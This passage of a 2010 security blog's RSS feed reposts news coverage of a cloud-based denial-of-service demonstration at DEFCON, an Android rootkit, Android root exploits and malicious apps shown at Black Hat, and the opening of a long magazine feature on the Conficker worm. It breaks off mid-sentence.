<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:pingback="http://madskills.com/public/xml/rss/module/pingback/" version="2.0">
  <channel>
    <title>loosy|goosy|ness - Blog - security</title>
    <link>http://www.loosy-goosy-ness.com/</link>
    <description>]..lost &amp; found in translation between bits &amp; bytes..[</description>
    <language>en-us</language>
    <copyright>Christian Maier</copyright>
    <lastBuildDate>Mon, 09 Aug 2010 17:37:32 GMT</lastBuildDate>
    <generator>newtelligence dasBlog 2.0.7226.0</generator>
    <managingEditor>agentcoyote@googlemail.com</managingEditor>
    <webMaster>agentcoyote@googlemail.com</webMaster>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=2a821114-6e00-4878-95d5-cd00936a6a52</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,2a821114-6e00-4878-95d5-cd00936a6a52.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
LAS VEGAS, NEVADA -- DEFCON 2010 -- With the help of the cloud, taking down small
and midsize companies' networks is easy, two consultants told attendees here last
week. 
</p>
        <p>
With a credit card and e-mail address, security consultants David Bryan of Trustwave
and Michael Anderson of NetSPI created a handful of virtual server instances on Amazon's
EC2 and used a homemade program to attack the network of a client -- a small business
that wanted its connectivity tested. 
</p>
        <p>
With only three servers -- although they eventually scaled up to 10 -- the consultants
took the company off the Internet. The price? Six dollars. 
</p>
        <p>
"A threat agent could potentially run extortion schemes against a company by
attacking for a couple of hours -- and then telling the company that, if you don't
pay me, then I will attack you again," Bryan said. 
</p>
        <p>
It's surprising how easy it is to block a company's lifeblood connection to the Internet,
the consultants said. To set up an account on Amazon EC2, there are no special bandwidth
agreements or detection of servers taking malicious actions, they claimed. Moreover,
complaints to Amazon by the client apparently went unanswered. 
</p>
        <p>
"We never got a response from Amazon," Anderson said. "We haven't gotten
a call; we never got an email." 
</p>
        <p>
Amazon could not comment on the consultants' specific claims, but stressed that the
company does have a rigorous response process. 
</p>
        <p>
"We do have a process for both detecting and responding to reports of abuse,"
Amazon spokeswoman Kay Kinton said in an email response. "We take all claims
of misuse of our services very seriously and investigate each one. When we find misuse,
we take action quickly and shut it down." 
</p>
        <p>
Small and midsize businesses should focus on basic strategies to defend themselves
against cloud-based denial-of-service attacks, experts say. While cloud services are
a new way to deliver attacks, the steps needed to defend a business' network and keep
it connected are no different than those used to defend against run-of-the-mill packet
floods. 
</p>
        <p>
First, employees responsible for a business's IT should have a DoS mitigation strategy
and test it. An example of how not to do it: The target of the consultants' attack,
a small financial institution, had defensive hardware in place, but had the threshold
bandwidth set way too high. The attack failed to trigger defensive measures, but the
bandwidth was still enough to take down the network, Bryan said. 
</p>
        <p>
"You have to make sure to tune your defenses," he said. 
</p>
        <p>
Clear responsibilities in the event of an attack are also key, the consultants said.
Once attacked, the client's employees became angry with each other and debated who
was responsible for responding. 
</p>
        <p>
"In the event of an attack or incident, you cannot be adversarial," Bryan
said. "Information sharing is key." 
</p>
        <p>
Most cybercriminals use botnets to conduct denial-of-service attacks on their targets.
Many botnets can be rented, or a subset of machines leased, essentially giving would-be
attackers a criminal "cloud" from which to buy services. 
</p>
        <p>
But renting server time from a legitimate cloud service is cheaper and can be more
effective, according to Bryan and Anderson. Because the traffic comes from Amazon's
Internet space, it can be harder to filter. And scaling the attack up is as easy as
instantiating a new virtual server. Moreover, many cloud services -- especially infrastructure-as-a-service
clouds -- appear to respond slowly to abuse. 
</p>
        <p>
"It's essentially a town without a sheriff," Bryan said. 
</p>
        <p>
Amazon refuted those assertions, saying that dealing with attacking servers is much
easier since it can identify them and shut them down. 
</p>
        <p>
"One thing I'd point out is that abusers who choose to run their software in
an environment like Amazon EC2 make it easier for us to access and disable their software,"
Amazon's Kinton says. "This is a significant improvement over the Internet as
a whole, where abusive hosts can be inaccessible and run unabated for long periods
of time." 
</p>
        <p>
The two consultants created a prototype attack tool, called Thunder Clap, that uses
cloud-based services to send a flood of packets toward the target company's network.
The software can be controlled directly or through a command left on a social network,
the researchers said. 
</p>
        <p>
The consultants recommended that providers that offer easy-to-configure cloud services
-- Amazon, Google, Microsoft and Rackspace -- should be more responsive to complaints
and more aware of the attack potential of their networks. 
</p>
        <p>
"If we complain loudly enough, maybe they will become more responsive,"
Anderson said. 
</p>
        <p>
          <strong>Source: </strong>
          <a title="http://www.darkreading.com/smb-security/security/perimeter/showArticle.jhtml?articleID=226500300" href="http://www.darkreading.com">http://www.darkreading.com</a>
        </p>
      </body>
      <title>Cloud-Based Denial Of Service Attacks Looming, Researchers Say</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,2a821114-6e00-4878-95d5-cd00936a6a52.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2010/08/09/CloudBasedDenialOfServiceAttacksLoomingResearchersSay.aspx</link>
      <pubDate>Mon, 09 Aug 2010 17:37:32 GMT</pubDate>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=c43583aa-50fe-47c6-b11f-e2c84ef7f70a</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,c43583aa-50fe-47c6-b11f-e2c84ef7f70a.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
At the <a href="http://www.defcon.org/">DEFCON</a> hacking conference, which <a href="http://www.defcon.org/html/defcon-18/dc-18-index.html">ended
yesterday</a>, IT security researchers <a href="http://www.defcon.org/html/defcon-18/dc-18-speakers.html#Percoco1">Nicholas
Percoco and Christian Papathanasiou</a> demonstrated what they claim is the first <a href="http://en.wikipedia.org/wiki/Rootkit">rootkit</a> for
Android. Their aim was to show how slight the obstacles to the development of such
a rootkit are and how powerful the result can be. Android is Linux-based and desktop
Linux rootkits are nothing out of the ordinary. The demo rootkit, dubbed "Mindtrick",
is a Loadable Kernel Module (LKM) and can conceal itself from other processes. The
demo was included in a DVD given to DEFCON delegates.
</p>
        <p>
The rootkit can gain access to Android devices, either by exploiting unpatched vulnerabilities,
or by pretending to be a legitimate app. Two other researchers recently <a href="http://www.h-online.com/news/item/Researchers-show-infecting-smartphones-with-malware-is-relatively-easy-950091.html">showed</a> that
it's possible to spread infected apps to thousands of devices. Once installed, the
rootkit is activated by calling the infected mobile from a specific number. It then
establishes a connection to the attacker's computer, which allows the phone to be
controlled remotely. As the researchers demonstrated in their talk, this gives the
attacker access to the Android phone's SQLite database, allowing them to view, for
example, a victim's texts or contacts.
</p>
        <p>
It's also possible to remotely read the device's current GPS coordinates and to make
outgoing calls without this being shown on the display. Criminals could make use of
the latter by running up costs for expensive sex lines which they in turn operate.
According to the researchers, current anti-virus software for Android does not (yet)
detect the rootkit.
</p>
        <p>
It is not clear whether Google would be able to disarm such a module using its remote
delete function – the deletion process applies to the application level, not the kernel
level. According to Percoco, the easiest way to protect against infection via a Loadable
Kernel Module would be for smartphone makers to only allow modules digitally signed
by the maker. The HTC device used for the demonstration clearly doesn't have this
kind of check.
</p>
        <p>
          <em>See also:</em>
        </p>
        <ul>
          <li>
            <a href="http://www.h-online.com/news/item/Google-uses-remote-delete-to-remove-Android-apps-from-smartphones-Update-1029188.html">Google
uses remote delete to remove Android apps from smartphones</a>
          </li>
        </ul>
        <p>
          <strong>Source: <a title="http://www.h-online.com/open/news/item/Android-rootkit-demonstrated-1049183.html" href="http://www.h-online.com/open/news/item/Android-rootkit-demonstrated-1049183.html">http://www.h-online.com</a></strong>
        </p>
      </body>
      <title>Android rootkit demonstrated</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,c43583aa-50fe-47c6-b11f-e2c84ef7f70a.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2010/08/03/AndroidRootkitDemonstrated.aspx</link>
      <pubDate>Tue, 03 Aug 2010 18:14:35 GMT</pubDate>
      <category>Android</category>
      <category>EN</category>
      <category>mobile</category>
      <category>security</category>
      <category>tech</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=892a677c-e369-42a8-83fc-6e86b3027add</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,892a677c-e369-42a8-83fc-6e86b3027add.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
Network World - LAS VEGAS -- Once thought to be <a href="http://www.productiveorganizer.com/android-productivity/android-phones-with-encrypted-bootloaderunhackable/">unhackable</a>,
the <a href="http://www.networkworld.com/columnists/2010/072610-gearhead.html">Android</a> phone
is anything but, according to researchers presenting at Black Hat 2010.
</p>
        <p>
          Not only has malicious software cloaked in a <a href=" http://www.networkworld.com/news/2010/072610-android-market-pros-and-cons.html?hpg1=bn">wallpaper
application</a> stolen personal information from <a href="http://www.networkworld.com/news/2010/070610-smartphone-essentials.html?fsrc=netflash-rss">infected
phones</a> and sent it to a Web site in China, but researchers from Lookout Mobile
Security have found a way to take the phones over completely - including top-of-the-line
models hawked by major wireless carriers.
</p>
        <p>
In one presentation, Lookout's CEO John Herring said the <a href="http://www.networkworld.com/news/2010/072210-55-of-google-android-smartphones.html?source=NWWNLE_nlt_google_2010-07-28">Jackeey
Wallpaper app</a>, which has been downloaded millions of times, can gather passwords, <a href="http://www.computerworld.com/s/topic/211/Browsers">browser</a> history,
the subscriber ID and SIM card numbers and text messages.
</p>
        <p>
In a separate presentation, researchers said top-of-the-line <a href="http://www.networkworld.com/slideshows/2010/072610-apple-android.html?hpg1=bn">Android</a> phones
used by Sprint and Verizon can be taken over completely by attacking known flaws in
the <a href="http://www.computerworld.com/s/topic/122/Linux+and+Unix">Linux</a> operating
system that underpins <a href="http://www.computerworld.com/s/article/9178688/Android_news_reviews_more">Android</a>,
researchers reported at Black Hat 2010. "It gives you root control, and you can
do anything you want to do" with the phone, says Anthony Lineberry, a researcher
for Lookout Mobile Security.
</p>
        <p>
The company says Android's reputation for security may be exaggerated. "It survived
the recent pwn2own slay fest unscathed, but this does not mean it is safe by any means,"
the company said in describing Lineberry's talk.
</p>
        <p>
The best way to distribute malware that could exploit the flaw - known as CVE-2009-1185
- is via <a href="http://www.networkworld.com/news/2010/072210-55-of-google-android-smartphones.html?source=NWWNLE_nlt_google_2010-07-28 ">Android</a> applications
that customers might acquire free or buy from the <a href="http://www.networkworld.com/news/2010/072610-android-market-pros-and-cons.html?hpg1=bn">Android
Market</a>. Installing the booby-trapped application would give root control of the
device, Lineberry says. "Root is kind of God mode in the context of Linux. Once
you have that, you have pretty much any system privilege."
</p>
        <p>
CVE-2009-1185 has been known for more than a year and can be patched, but so far the
carriers have not issued patches, Lineberry says. The root-control exploit has been
successfully carried out in Lookout labs on EVO 4G (Sprint), Droid X (Verizon), and
Droid Incredible (Verizon) as well as older models G1 and Hero, he says.
</p>
        <p>
But root control is unnecessary in order to carry out the type of attack executed
by Jackeey Wallpaper, according to another Lookout researcher, Tim Wyatt. Applications
require permissions in order to access features of the phone, and these permissions
can be exploited. So, for instance, an application that tells the customer the nearest
Chinese restaurant would need access to the phone's GPS capabilities.
</p>
        <p>
When selling applications, developers must list all the permissions the application
requires to work, and the customer must sign off on allowing those permissions. An
application that sorts SMS messages but requires Internet access may seem suspicious,
and customers might bail out of buying the application.
</p>
        <p>
But some permissions sound innocuous, Wyatt says. Customers might not know what the
permission "Import Android log" means, but approve an application that requires
it because the name of the permission doesn't sound threatening. But the logs can
reveal browsing histories, passwords, phone numbers and a wealth of other data, he
says.
</p>
        <p>
Malicious applications with Internet permissions can be crafted to send the data in
the background or display innocuous Web sites to mask where the data is being sent,
Wyatt says.
</p>
        <p>
The best course for users is to be wary of the applications they buy and, if they are suspicious,
not to download the apps, Lineberry says.
</p>
        <p>
Lookout has carried out a study it calls the App Genome project that examined Android
and <a href="http://www.computerworld.com/s/article/9108338/Continuing_coverage_Apple_s_iPhone">iPhone</a> applications
for what permissions they have and what malicious activity they might carry out with
the set of permissions they have. An application might use the permissions legitimately,
but in the hands of a hacker could cause mischief, the company says.
</p>
        <p>
Part of the permission system in Android allows applications to tap each other's resources,
so an application without permission to access the Internet might have access to an
application that does and so use the Internet anyway, the researchers say.
</p>
        <p>
Source: <a title="http://www.computerworld.com/s/article/9179863/_Unhackable_Android_can_be_hacked_Black_Hat_researchers_say?taxonomyId=15" href="http://www.computerworld.com">www.computerworld.com</a></p>
      </body>
      <title>'Unhackable' Android can be hacked, Black Hat researchers say</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,892a677c-e369-42a8-83fc-6e86b3027add.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2010/07/29/UnhackableAndroidCanBeHackedBlackHatResearchersSay.aspx</link>
      <pubDate>Thu, 29 Jul 2010 22:39:48 GMT</pubDate>
      <description>&lt;p&gt;
Network World - LAS VEGAS -- Once thought to be &lt;a href="http://www.productiveorganizer.com/android-productivity/android-phones-with-encrypted-bootloaderunhackable/"&gt;unhackable&lt;/a&gt;,
the &lt;a href="http://www.networkworld.com/columnists/2010/072610-gearhead.html"&gt;Android&lt;/a&gt; phone
is anything but, according to researchers presenting at Black Hat 2010.
&lt;/p&gt;
&lt;p&gt;
&lt;a href="http://www.networkworld.com/community/node/64266 "&gt;FBI details worst social
networking cyber crime problems&lt;/a&gt;Not only has malicious software cloaked in a &lt;a href=" http://www.networkworld.com/news/2010/072610-android-market-pros-and-cons.html?hpg1=bn"&gt;wallpaper
application&lt;/a&gt; stolen personal information from &lt;a href="http://www.networkworld.com/news/2010/070610-smartphone-essentials.html?fsrc=netflash-rss"&gt;infected
phones&lt;/a&gt; and sent it to a Web site in China, but researchers from Lookout Mobile
Security have found a way to take the phones over completely - including top-of-the-line
models hawked by major wireless carriers.
&lt;/p&gt;
&lt;p&gt;
In one presentation, Lookout's CEO John Herring said the &lt;a href="http://www.networkworld.com/news/2010/072210-55-of-google-android-smartphones.html?source=NWWNLE_nlt_google_2010-07-28"&gt;Jackeey
Wallpaper app&lt;/a&gt;, which has been downloaded millions of times, can gather passwords, &lt;a href="http://www.computerworld.com/s/topic/211/Browsers"&gt;browser&lt;/a&gt; history,
the subscriber ID and SIM card numbers and text messages.
&lt;/p&gt;
&lt;p&gt;
In a separate presentation, researchers said top-of-the-line &lt;a href="http://www.networkworld.com/slideshows/2010/072610-apple-android.html?hpg1=bn"&gt;Android&lt;/a&gt; phones
used by Sprint and Verizon can be taken over completely by attacking known flaws in
the &lt;a href="http://www.computerworld.com/s/topic/122/Linux+and+Unix"&gt;Linux&lt;/a&gt; operating
system that underpins &lt;a href="http://www.computerworld.com/s/article/9178688/Android_news_reviews_more"&gt;Android&lt;/a&gt;,
researchers reported at Black Hat 2010. &amp;quot;It gives you root control, and you can
do anything you want to do&amp;quot; with the phone, says Anthony Lineberry, a researcher
for Lookout Mobile Security.
&lt;/p&gt;
&lt;p&gt;
The company says Android's reputation for security may be exaggerated. &amp;quot;It survived
the recent pwn2own slay fest unscathed, but this does not mean it is safe by any means,&amp;quot;
the company said in describing Lineberry's talk.
&lt;/p&gt;
&lt;p&gt;
The best way to distribute malware that could exploit the flaw - known as CVE-2009
1185 - is via &lt;a href="http://www.networkworld.com/news/2010/072210-55-of-google-android-smartphones.html?source=NWWNLE_nlt_google_2010-07-28 "&gt;Android&lt;/a&gt; applications
that customers might acquire free or buy from the &lt;a href="http://www.networkworld.com/news/2010/072610-android-market-pros-and-cons.html?hpg1=bn"&gt;Android
Market&lt;/a&gt;. Installing the booby-trapped application would give root control of the
device, Lineberry says. &amp;quot;Root is kind of God mode in the context of Linux. Once
you have that, you have pretty much any system privilege.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
CVE-2009 1185 has been known for more than a year and can be patched, but so far the
carriers have not issued patches, Lineberry says. The root-control exploit has been
successfully carried out in Lookout labs on EVO 4G (Sprint), Droid X (Verizon), and
Droid Incredible (Verizon) as well as older models G1 and Hero, he says.
&lt;/p&gt;
&lt;p&gt;
But root control is unnecessary in order to carry out the type of attack executed
by Jackeey Wallpaper, according to another Lookout researcher, Tim Wyatt. Applications
require permissions in order to access features of the phone, and these permissions
can be exploited. So, for instance, an application that tells the customer the nearest
Chinese restaurant would need access to the phones GPS capabilities.
&lt;/p&gt;
&lt;p&gt;
When selling applications, developers must list all the permissions the application
requires to work, and the customer must sign off on allowing those permissions. An
application that sorts SMS messages but requires Internet access may seem suspicious,
and customers might bail out of buying the application.
&lt;/p&gt;
&lt;p&gt;
But some permissions sound innocuous, Wyatt says. Customers might not know what the
permission &amp;quot;Import Android log&amp;quot; means, but approve an application that requires
it because the name of the permission doesn't sound threatening. But the logs can
reveal browsing histories, passwords, phone numbers and a wealth of other data, he
says.
&lt;/p&gt;
&lt;p&gt;
Malicious applications with Internet permissions can be crafted to send the data in
the background or display innocuous Web sites to mask where the data is being sent,
Wyatt says.
&lt;/p&gt;
&lt;p&gt;
The best course for users is to beware of the applications they buy and, if they are suspicious,
not to download the apps, Lineberry says.
&lt;/p&gt;
&lt;p&gt;
Lookout has carried out a study it calls the App Genome project that examined Android
and &lt;a href="http://www.computerworld.com/s/article/9108338/Continuing_coverage_Apple_s_iPhone"&gt;iPhone&lt;/a&gt; applications
for what permissions they have and what malicious activity they might carry out with
the set of permissions they have. An application might use the permissions legitimately,
but in the hands of a hacker could cause mischief, the company says.
&lt;/p&gt;
&lt;p&gt;
Part of the permission system in Android allows applications to tap each other's resources,
so an application without permission to access the Internet might have access to an
application that does and so use the Internet anyway, the researchers say.
&lt;/p&gt;
&lt;p&gt;
Source: &lt;a title="http://www.computerworld.com/s/article/9179863/_Unhackable_Android_can_be_hacked_Black_Hat_researchers_say?taxonomyId=15" href="http://www.computerworld.com"&gt;www.computerworld.com&lt;/a&gt;
&lt;/p&gt;
&lt;img width="0" height="0" src="http://www.loosy-goosy-ness.com/aggbug.ashx?id=892a677c-e369-42a8-83fc-6e86b3027add" /&gt;</description>
      <category>EN</category>
      <category>mobile</category>
      <category>security</category>
      <category>tech</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=58a7c601-2511-40c8-a988-07af4fe2d9ca</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,58a7c601-2511-40c8-a988-07af4fe2d9ca.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
          <em>When the Conficker computer “worm” was unleashed on the world in November 2008,
cyber-security experts didn’t know what to make of it. It infiltrated millions of
computers around the globe. It constantly checks in with its unknown creators. It
uses an encryption code so sophisticated that only a very few people could have deployed
it. For the first time ever, the cyber-security elites of the world have joined forces
in a high-tech game of cops and robbers, trying to find Conficker’s creators and defeat
them. The cops are failing. And now the worm lies there, waiting …</em>
        </p>
        <h6>By Mark Bowden
</h6>
        <p>
          <img src="http://assets.theatlantic.com/static/coma/images/issues/201006/conficker-wide.jpg" />
          <br />
          <em>Image credit: Alex Ostroy </em>
        </p>
        <p>
The first surprising thing about the worm that landed in Philip Porras’s digital petri
dish 18 months ago was how fast it grew. 
</p>
        <p>
He first spotted it on Thursday, November 20, 2008. Computer-security experts around
the world who didn’t take notice of it that first day soon did. Porras is part of
a loose community of high-level geeks who guard computer systems and monitor the health
of the Internet by maintaining “honeypots,” unprotected computers irresistible to
“malware,” or malicious software. A honeypot is either a real computer or a virtual
one within a larger computer designed to snare malware. There are also “honeynets,”
which are networks of honeypots. A worm is a cunningly efficient little packet of
data in computer code, designed to slip inside a computer and set up shop without
attracting attention, and to do what this one was so good at: replicate itself. 
</p>
        <p>
Most of what honeypots snare is routine, the viral annoyances that have bedeviled
computer-users everywhere for the past 15 years or so, illustrating the principle
that any new tool, no matter how useful to humankind, will eventually be used for
harm. Viruses are responsible for such things as the spamming of your inbox with penis-enlargement
come-ons or million-dollar investment opportunities in Nigeria. Some malware is designed
to damage or destroy your computer, so once you get the infection, you quickly know
it. More-sophisticated computer viruses, like the most successful biological viruses,
and like this new worm, are designed for stealth. Only the most technically capable
and vigilant computer-operators would ever notice that one had checked in. 
</p>
        <p>
Porras, who operates a large honeynet for <a href="http://www.sri.com/">SRI International</a> in
Menlo Park, California, noted the initial infection, and then an immediate reinfection.
Then another and another and another. The worm, once nestled inside a computer, began
automatically scanning for new computers to invade, so it spread exponentially. It
exploited a flaw in Microsoft Windows, particularly Windows 2000, Windows XP, and
Windows Server 2003—some of the most common operating systems in the world—so it readily
found new hosts. As the volume increased, the rate of repeat infections in Porras’s
honeynet accelerated. Within hours, duplicates of the worm were crowding in so rapidly
that they began to push all the other malware, the ordinary daily fare, out of the
way. If the typical inflow is like a stream from a faucet, this new strain seemed
shot out of a fire hose. It came from computer addresses all over the world. Soon
Porras began to hear from others in his field who were seeing the same thing. Given
the instant and omnidirectional nature of the Internet, no one could tell where the
worm had originated. Overnight, it was everywhere. And on closer inspection, it became
clear that voracity was just the first of its remarkable traits. 
</p>
        <p>
Various labs assigned names to the worm. It was dubbed “Downadup” and “Kido,” but
the name that stuck was “Conficker,” which it was given after it tried to contact
a fake security Web site, trafficconverter.biz. Microsoft security programmers shuffled
the letters and came up with <i>Conficker</i>, which stuck partly because <i>ficker</i> is
German slang for “motherfucker,” and the worm was certainly that. At the same time
that Conficker was spewing into honeypots, it was quietly slipping into personal computers
worldwide—an estimated 500,000 in the first month. 
</p>
        <p>
Why? What was its purpose? What was it telling all those computers to do? 
</p>
        <p>
Imagine your computer to be a big spaceship, like the starship <i>Enterprise</i> on <i>Star
Trek</i>. The ship is so complex and sophisticated that even an experienced commander
like Captain James T. Kirk has only a general sense of how every facet of it works.
From his wide swivel chair on the bridge, he can order it to fly, maneuver, and fight,
but he cannot fully comprehend all its inner workings. The ship contains many complex,
interrelated systems, each with its own function and history—systems for, say, guidance,
maneuvers, power, air and water, communications, temperature control, weapons, defensive
measures, etc. Each system has its own operator, performing routine maintenance, exchanging
information, making fine adjustments, keeping it running or ready. When idling or
cruising, the ship essentially runs itself without a word from Captain Kirk. It obeys
when he issues a command, and then returns to its latent mode, busily doing its own
thing until the next time it is needed. 
</p>
        <p>
Now imagine a clever invader, an enemy infiltrator, who <i>does</i> understand the
inner workings of the ship. He knows it well enough to find a portal with a broken
lock overlooked by the ship’s otherwise vigilant defenses—like, say, a flaw in Microsoft’s
operating platform. So no one notices when he slips in. He trips no alarm, and then,
to prevent another clever invader from exploiting the same weakness, he repairs the
broken lock and seals the portal shut behind him. He <i>improves</i> the ship’s defenses.
Ensconced securely inside, he silently sets himself up as the ship’s alternate commander.
He enlists the various operating functions of the ship to do his bidding, careful
to avoid tripping any alarms. Captain Kirk is still up on the bridge in his swivel
chair with the magnificent instrument arrays, unaware that he now has a rival in the
depths of his ship. The <i>Enterprise</i> continues to perform as it always has. Meanwhile,
the invader begins surreptitiously communicating with his own distant commander, letting
him know that he is in position and ready, waiting for instructions. 
</p>
        <p>
And now imagine a vast fleet, in which the <i>Enterprise</i> is only one ship among
millions, all of them infiltrated in exactly the same way, each ship with its hidden
pilot, ever alert to an outside command. In the real world, this infiltrated fleet
is called a “botnet,” a network of infected, “robot” computers. The first job of a
worm like Conficker is to infect and link together as many computers as possible—the
phenomenon witnessed by Porras and other security geeks in their honeypots. Thousands
of botnets exist, most of them relatively small—a few thousand or a few tens of thousands
of infected computers. More than a billion computers are in use around the world,
and by some estimates, a fourth of them have been surreptitiously linked to a botnet.
But few botnets approach the size and menace of the one created by Conficker, which
has stealthily linked between 6 million and 7 million computers. 
</p>
        <p>
Once created, botnets are valuable tools for criminal enterprise. Among other things,
they can be used to efficiently distribute malware, to steal private information from
otherwise secure Web sites or computers, to assist in fraudulent schemes, or to launch
denial-of-service attacks—overwhelming a target computer with a flood of requests
for response. The creator of an effective botnet, one with a wide range and the staying
power to defeat security measures, can use it himself for one of the above scams,
or he can sell or lease it to people who specialize in exploiting botnets. (Botnets
can be bought or leased in underground markets online.) 
</p>
        <p>
Beyond criminal enterprise, botnets are also potentially dangerous weapons. If the
right order were given, and all these computers worked together in one concerted effort,
a botnet with that much computing power could crack many codes, break into and plunder
just about any protected database in the world, and potentially hobble or even destroy
almost any computer network, including those that make up a country’s vital modern
infrastructure: systems that control banking, telephones, energy flow, air traffic,
health-care information—even the Internet itself. 
</p>
        <p>
The key word there is <i>could</i>, because so far Conficker has done none of those
things. It has been activated only once, to perform a relatively mundane spamming
operation—enough to demonstrate that it is not benign. No one knows who created it.
No one yet fully understands how it works. No one knows how to stop it or kill it.
And no one even knows for sure <i>why</i> it exists. 
</p>
        <p>
If yours is one of the infected machines, you are like Captain Kirk, seemingly in
full command of your ship, unaware that you have a hidden rival, or that you are part
of this vast robot fleet. The worm inside your machine is not idle. It is stealthily
running, issuing small maintenance commands, working to protect itself from being
discovered and removed, biding its time, and periodically checking in with its command-and-control
center. Conficker has taken over a large part of our digital world, and so far most
people haven’t even noticed. 
</p>
        <p>
The struggle against this remarkable worm is a sort of chess match unfolding in the
esoteric world of computer security. It pits the cleverest attackers in the world,
the bad guys, against the cleverest defenders in the world, the good guys (who have
been dubbed the “Conficker Cabal”). It has prompted the first truly concerted global
effort to kill a computer virus, extraordinary feats of international cooperation,
and the deployment of state-of-the-art decryption techniques—moves and countermoves
at the highest level of programming. The good guys have gone to unprecedented lengths,
and have had successes beyond anything they would have thought possible when they
started. But a year and a half into the battle, here’s the bottom line: 
</p>
        <p>
The worm is winning. 
</p>
        <p>
          <b>A Digital Sam Spade </b>
        </p>
        <p>
Twenty years ago, computers were bedeviled by hackers. These were savvy outlaws who
used their deep knowledge of operating systems to invade, steal, and destroy, or sometimes
just to tap into secure facilities and show off their skills. Hackers became heroes
to a generation of teenagers, and had all sorts of motives, but their most distinctive
trait was a tendency to show off. 
</p>
        <p>
Some had truly malicious intent. In his 1989 best seller, <i><a href="http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/0743411463">The
Cuckoo’s Egg</a></i>, Cliff Stoll told the story of his stubborn, virtually single-handed
hunt for an elusive hacker in Germany who was using Stoll’s computer system at the
Lawrence Berkeley National Laboratory as a portal to Defense Department computers.
For many people, Stoll’s book was the introduction to the netherworld of rarefied
gamesmanship that defines computer security. Stoll’s hacker never penetrated the most
secret corners of the national-security net, and even relatively serious breaches
like the one Stoll described were more nuisance than threat. But the individual hacker
working as a spy or vandal has evolved into something more organized and menacing. 
</p>
        <p>
Andre’ M. DiMino, a computer sleuth who is part of the Conficker Cabal, is considered
one of the world’s foremost authorities on botnets. He stumbled into his avocation
on a Monday morning a decade ago, when he discovered that over the weekend, someone
had broken into the computer system he was administering for a small company in New
Jersey. DiMino has an undergraduate degree in electrical engineering with an emphasis
in computer science, but he has mostly taught himself up to his present level of expertise,
which is extreme. At 45, he is a slender, affable idealist who keeps a small array
of computers in an upstairs bedroom. When I stopped by to talk to him, he baked me
pizza. His day job is doing computer forensics for law enforcement in Bergen County,
New Jersey, but he has a kind of alter ego as what he calls a “botnet hunter.” 
</p>
        <p>
Back when he discovered the weekend break-in, DiMino assumed at first that it was
the work of a hacker, a vandal, or possibly a former employee, only to discover, based
on an analysis of the IP (Internet Protocol) addresses of the incoming data, that
his little computer network had been invaded by someone from Turkey or Ukraine. What
would someone halfway around the planet want with the computer system of a small business-management
firm in a New Jersey office park? Apparently, judging by what he found, his invader
was in the business of selling pirated software, movies, and music. Needing large
amounts of digital storage space to hide stolen inventory, the culprit seemed to have
conducted an automated search over the Internet, looking worldwide for vulnerable
systems with large amounts of unused disc space—DiMino equates it to walking around
rattling doorknobs, looking for one door left unlocked. DiMino’s system fit the bill,
so the crooks had dumped a huge bloc of data onto his discs. He erased the stash and
locked the door that had allowed the pirates in. As far as the company was concerned,
that solved the problem. No harm done. No need to call the police or investigate further. 
</p>
        <p>
But DiMino was intrigued. He reviewed the server logs for previous weeks and saw that
this successful invasion was one of many such efforts. Other attackers had been rattling
the doors of his network, looking for vulnerabilities. If there were bad guys actively
exploiting other people’s computers all over the world, designing sophisticated programs
to exploit weaknesses … how cool was that? And who was trying to stop them? 
</p>
        <p>
DiMino set about educating himself on the fine points of this obscure battle of wits.
He eventually co-founded the <a href="http://www.shadowserver.org/">Shadowserver Foundation</a>,
a nonprofit partnership of defense-minded geeks at war with malware, effectively transforming
himself into a digital Sam Spade—indeed, the graphic atop Shadowserver’s home page
features a <a href="http://en.wikipedia.org/wiki/Dashiell_Hammett">Dashiell Hammett</a>–style
detective emerging from shadow. 
</p>
        <p>
Both sides in this cyberwar have become astonishingly sophisticated, operating at
the cutting edge of programming theory and cryptography. Both understand the limits
of security methodology, the one side working to broaden its reach, the other working
to surpass it. Because malware has been automated, the good guys usually can only
guess at who they are up against. 
</p>
        <p>
          <b>Trojans, Viruses, and Worms </b>
        </p>
        <p>
Rodney Joffe heads the cabal that has been battling Conficker. He is a burly, garrulous
South African–born American who serves as senior vice president and chief technologist
for <a href="http://www.neustar.biz/">Neustar</a>, a company that provides trunk-line
service for competing cell-phone companies around the world. Joffe’s interest in stopping
the worm did not stem just from his outrage and sense of justice. His concern for
